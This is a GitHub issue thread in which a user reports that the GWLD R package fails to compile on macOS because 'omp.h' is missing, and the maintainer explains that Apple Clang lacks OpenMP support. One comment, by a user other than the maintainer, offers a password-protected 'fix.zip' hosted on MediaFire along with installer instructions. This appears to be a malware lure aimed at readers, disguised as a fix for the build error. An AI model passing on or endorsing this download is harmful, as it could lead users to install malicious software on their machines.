### ISSUE TITLE
R package Installation Issue

### ISSUE THREAD

**Issue by CNLove-260** [Rong-Zh/GWLD#5]
I am having issues with installing the R package? I have tried a few variants on the suggested devtools installation and generally continue to get: 

> devtools::install_github('Rong-Zh/GWLD/GWLD-R')
> Downloading GitHub repo Rong-Zh/GWLD@HEAD
> ── R CMD build ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
> ✔  checking for file ‘/private/var/folders/x6/0kqx10p52sl8yqnp3gl992_00000gn/T/Rtmpqoo6zt/remotesec354f75c66/Rong-Zh-GWLD-c8079ab/GWLD-R/DESCRIPTION’ ...
> ─  preparing ‘GWLD’:
> ✔  checking DESCRIPTION meta-information
> ─  cleaning src
> ─  checking for LF line-endings in source and make files and shell scripts
> ─  checking for empty or unneeded directories
> ─  building ‘GWLD_1.3.7.tar.gz’
>    
> * installing *source* package ‘GWLD’ ...
> ** using staged installation
> ** libs
> using C++ compiler: ‘Apple clang version 15.0.0 (clang-1500.3.9.4)’
> using C++11
> using SDK: ‘MacOSX14.4.sdk’
> clang++ -arch arm64 -std=gnu++11 -I"/Library/Frameworks/R.framework/Resources/include" -DNDEBUG  -I'/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/Rcpp/include' -I'/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/RcppArmadillo/include' -I/opt/R/arm64/include    -DARMA_64BIT_WORD=1 -fPIC  -falign-functions=64 -Wall -g -O2   -c RcppExports.cpp -o RcppExports.o
> clang++ -arch arm64 -std=gnu++11 -I"/Library/Frameworks/R.framework/Resources/include" -DNDEBUG  -I'/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/Rcpp/include' -I'/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/RcppArmadillo/include' -I/opt/R/arm64/include    -DARMA_64BIT_WORD=1 -fPIC  -falign-functions=64 -Wall -g -O2   -c codeGenotype.cpp -o codeGenotype.o
> clang++ -arch arm64 -std=gnu++11 -I"/Library/Frameworks/R.framework/Resources/include" -DNDEBUG  -I'/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/Rcpp/include' -I'/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/RcppArmadillo/include' -I/opt/R/arm64/include    -DARMA_64BIT_WORD=1 -fPIC  -falign-functions=64 -Wall -g -O2   -c filedeal.cpp -o filedeal.o
> clang++ -arch arm64 -std=gnu++11 -I"/Library/Frameworks/R.framework/Resources/include" -DNDEBUG  -I'/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/Rcpp/include' -I'/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/RcppArmadillo/include' -I/opt/R/arm64/include    -DARMA_64BIT_WORD=1 -fPIC  -falign-functions=64 -Wall -g -O2   -c method.cpp -o method.o
> method.cpp:6:10: fatal error: 'omp.h' file not found
> #include <omp.h>
>          ^~~~~~~
> 1 error generated.
> make: *** [method.o] Error 1
> ERROR: compilation failed for package ‘GWLD’
> * removing ‘/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/GWLD’
> Warning message:
> In i.p(...) :
>   installation of package ‘/var/folders/x6/0kqx10p52sl8yqnp3gl992_00000gn/T//Rtmpqoo6zt/fileec33bd3581e/GWLD_1.3.7.tar.gz’ had non-zero exit status
> > Sys.setenv(CXXFLAGS = "-Xpreprocessor -fopenmp -I$(brew --prefix libomp)/include")
> > 
> > Sys.setenv(LDFLAGS = "-L$(brew --prefix libomp)/lib -lomp")
> > devtools::install_github('Rong-Zh/GWLD/GWLD-R')
> Downloading GitHub repo Rong-Zh/GWLD@HEAD
> ── R CMD build ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
> ✔  checking for file ‘/private/var/folders/x6/0kqx10p52sl8yqnp3gl992_00000gn/T/Rtmpqoo6zt/remotesec367f27af4/Rong-Zh-GWLD-c8079ab/GWLD-R/DESCRIPTION’ ...
> ─  preparing ‘GWLD’:
> ✔  checking DESCRIPTION meta-information
> ─  cleaning src
> ─  checking for LF line-endings in source and make files and shell scripts
> ─  checking for empty or unneeded directories
> ─  building ‘GWLD_1.3.7.tar.gz’
>    
> * installing *source* package ‘GWLD’ ...
> ** using staged installation
> ** libs
> using C++ compiler: ‘Apple clang version 15.0.0 (clang-1500.3.9.4)’
> using C++11
> using SDK: ‘MacOSX14.4.sdk’
> clang++ -arch arm64 -std=gnu++11 -I"/Library/Frameworks/R.framework/Resources/include" -DNDEBUG  -I'/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/Rcpp/include' -I'/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/RcppArmadillo/include' -I/opt/R/arm64/include    -DARMA_64BIT_WORD=1 -fPIC  -falign-functions=64 -Wall -g -O2   -c RcppExports.cpp -o RcppExports.o
> clang++ -arch arm64 -std=gnu++11 -I"/Library/Frameworks/R.framework/Resources/include" -DNDEBUG  -I'/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/Rcpp/include' -I'/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/RcppArmadillo/include' -I/opt/R/arm64/include    -DARMA_64BIT_WORD=1 -fPIC  -falign-functions=64 -Wall -g -O2   -c codeGenotype.cpp -o codeGenotype.o
> clang++ -arch arm64 -std=gnu++11 -I"/Library/Frameworks/R.framework/Resources/include" -DNDEBUG  -I'/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/Rcpp/include' -I'/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/RcppArmadillo/include' -I/opt/R/arm64/include    -DARMA_64BIT_WORD=1 -fPIC  -falign-functions=64 -Wall -g -O2   -c filedeal.cpp -o filedeal.o
> clang++ -arch arm64 -std=gnu++11 -I"/Library/Frameworks/R.framework/Resources/include" -DNDEBUG  -I'/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/Rcpp/include' -I'/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/RcppArmadillo/include' -I/opt/R/arm64/include    -DARMA_64BIT_WORD=1 -fPIC  -falign-functions=64 -Wall -g -O2   -c method.cpp -o method.o
> method.cpp:6:10: fatal error: 'omp.h' file not found
> #include <omp.h>
>          ^~~~~~~
> 1 error generated.
> make: *** [method.o] Error 1
> ERROR: compilation failed for package ‘GWLD’
> * removing ‘/Library/Frameworks/R.framework/Versions/4.4-arm64/Resources/library/GWLD’
> Warning message:
> In i.p(...) :
>   installation of package ‘/var/folders/x6/0kqx10p52sl8yqnp3gl992_00000gn/T//Rtmpqoo6zt/fileec360665e7c/GWLD_1.3.7.tar.gz’ had non-zero exit status

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CNLove-260** [comment]
Thank you! Can you please explain what the issue is and what is in this file?

**Comment by Rong-Zh** [comment]
The default compiler on macOS, Apple Clang (also known as /usr/bin/gcc), does not support OpenMP. For macOS, install LLVM and libomp first。
